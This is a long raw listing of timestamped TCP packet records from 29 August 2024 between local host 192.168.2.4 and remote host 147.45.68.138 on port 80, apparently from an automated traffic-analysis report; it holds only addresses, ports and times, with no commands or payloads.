                                                      Aug 29, 2024 22:52:21.404655933 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.404665947 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.404680014 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.404689074 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.404700994 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.404731035 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.404911995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.404922009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.404927969 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.404959917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.404964924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.404970884 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.404982090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.405010939 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.405038118 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.405086994 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.405100107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.405109882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.405117989 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.405122042 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.405133963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.405142069 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.405189991 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.405756950 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.405790091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.405800104 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.405812025 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.405885935 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.405981064 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.405991077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.405996084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.406001091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.406007051 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.406012058 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.406017065 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.406022072 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.406028032 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.406066895 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.406110048 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.406683922 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.406725883 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.406779051 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.406790018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.406795979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.406800985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.406805038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.406819105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.406831026 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.406841993 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.406848907 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.406853914 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.406857014 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.406861067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.406898975 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.407732964 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.407742977 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.407751083 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.407761097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.407771111 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.407777071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.407782078 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.407788038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.407798052 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.407831907 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.407838106 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.407851934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.407861948 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.407896042 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.407922983 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.408526897 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.408538103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.408550978 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.408557892 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.408562899 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.408566952 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.408612967 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.408618927 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.408629894 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.408634901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.408639908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.408682108 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.408715010 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.408725977 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.408731937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.408736944 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.408792019 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.409459114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.409468889 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.409480095 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.409499884 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.409518957 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.409528971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.409533024 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.409534931 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.409540892 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.409595013 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.409637928 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.409648895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.409658909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.409663916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.409668922 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.409672022 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.409673929 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.409679890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.409683943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.409722090 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.412410975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.412451982 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.412589073 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.412636995 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.412780046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.412839890 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.412935972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.413002968 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.413125992 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.413177967 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.413302898 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.413350105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.413456917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.413525105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.413535118 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.413573027 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.413717031 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.413728952 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.413849115 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.414376974 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414387941 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414441109 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.414536953 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414547920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414557934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414563894 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414568901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414573908 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.414573908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414674044 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.414686918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414696932 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414704084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414745092 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.414763927 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414773941 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414778948 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414783955 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414789915 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414796114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414828062 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.414859056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414869070 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414874077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414879084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414882898 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414892912 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414897919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414902925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414912939 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.414946079 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414952040 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414957047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414963007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414967060 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414973974 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414983034 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.414999962 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415009975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415015936 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.415029049 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.415071964 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.415183067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415220022 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.415322065 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415333033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415343046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415354967 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.415364981 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.415386915 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.415524006 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415534973 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415544033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415549040 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415554047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415559053 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415564060 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415569067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415572882 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.415574074 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415580034 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415635109 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.415663004 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415704012 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.415832043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415842056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415847063 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415853024 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415858984 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415865898 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.415901899 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.416018009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416028023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416033983 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416038036 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416099072 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.416203976 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416219950 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416230917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416241884 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416246891 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.416254044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416259050 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416264057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416269064 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416269064 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.416275024 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416280985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416285992 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416326046 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.416330099 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416337967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416379929 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.416475058 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416492939 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416503906 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416517973 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.416542053 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.416623116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416635036 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416640043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416646004 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416651011 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416656017 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416661024 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416702986 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.416721106 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416731119 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416735888 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416743040 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416795015 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.416897058 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.416907072 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417001009 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.417033911 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417043924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417048931 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417098999 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.417112112 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417123079 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417129040 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417139053 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417144060 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417150021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417154074 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.417243004 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.417258024 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417268991 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417278051 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417295933 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.417346954 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.417449951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417459965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417464972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417469978 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417474985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417484045 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417489052 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417494059 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.417510033 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.417599916 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.431448936 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.431462049 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.431473017 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.431483984 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.431505919 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.431536913 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.431580067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.431591034 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.431618929 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.431746960 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.431790113 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.437582016 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.437593937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.437598944 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.437674999 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.437699080 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.437710047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.437715054 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.437750101 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.437871933 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.437881947 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.437891960 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.437911034 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.437936068 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.466950893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.466974020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.466985941 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.466996908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.467008114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.467019081 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.467025042 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.467026949 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.467031002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.467036963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.467041969 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.467047930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.467048883 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.467052937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.467058897 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.467070103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.467097044 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.467180014 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.487763882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.487782001 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.487792015 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.487832069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.487843037 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.487852097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.487865925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.487942934 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.487950087 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.487963915 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.487974882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.487987995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.487998009 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488012075 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488032103 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488037109 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488048077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488055944 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488069057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488079071 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488101959 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488207102 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488218069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488228083 CEST8049739147.45.68.138192.168.2.4
